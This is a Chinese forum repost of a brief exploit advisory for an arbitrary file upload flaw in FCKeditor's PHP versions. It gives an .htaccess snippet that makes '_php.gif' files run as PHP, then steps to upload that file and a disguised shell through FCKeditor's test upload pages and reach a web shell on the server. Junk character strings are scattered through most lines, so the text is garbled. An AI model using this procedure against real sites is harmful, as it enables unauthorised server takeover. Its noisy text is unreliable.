FCKeditor所有php版本Upload上传漏洞5 S0 N$ }! @8 u1 l! e; s7 l+ I$ P
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07. ^7 S. C9 @) O G1 z7 l! n
减小字体 增大字体) E- G. h/ W1 U
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
' F) H' W7 O+ i7 f0 u[+] Date: 2011" q; v* ?2 e+ |1 B
[+] Author : sinesafe.cn
, v5 U9 T/ B* Q4 M$ C[+] Website : WwW.sinesafe.cn/ E7 r; V: |6 W7 L- [5 y
———————————————————% B# N4 R' R3 c- C- o/ S
1.create a htaccess file:, q0 q4 ?' b/ K( K' \4 A
code:
8 I+ `7 O0 R% _( C+ `# S4 P<FilesMatch “_php.gif”>
% w+ N0 Z! X, p4 i6 d kSetHandler application/x-httpd-php, r. f0 t% Y5 o6 |
</FilesMatch>
* I+ O8 o. x* |# ]9 @
2 ], o& b8 L/ V7 A2 \" t6 w2.Now upload this htaccess with FCKeditor.
7 _. s: H# ^- B! c# P+ M9 x6 ~* P) R) L1 F
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
# A; t; L8 d( Q" `. O1 m* N
8 p& X7 j) @3 {3 ]' T( H; Fhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html: M' |4 E+ ] w6 B
' \4 ~9 w. M( H
———————————————————————————————- K. S: j+ \) d& @" B
3.Now upload shell.php.gif with FCKeditor.1 _4 `, L+ E$ N8 a# F" t
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
) i0 k* w0 h+ [. Z: ?5.http://www.sinesafe.cn/anything/shell_php.gif. @( b% ^. ]/ L- F8 t( y, W
6.Now shell is available from server. |
9 K) i4 L5 w8 f. F) e' U
. V% Y; U2 o9 w; P. p' g; M. | h3 C+ P* U5 {
|
发表于 2013-10-27 17:25:21
收藏
支持
反对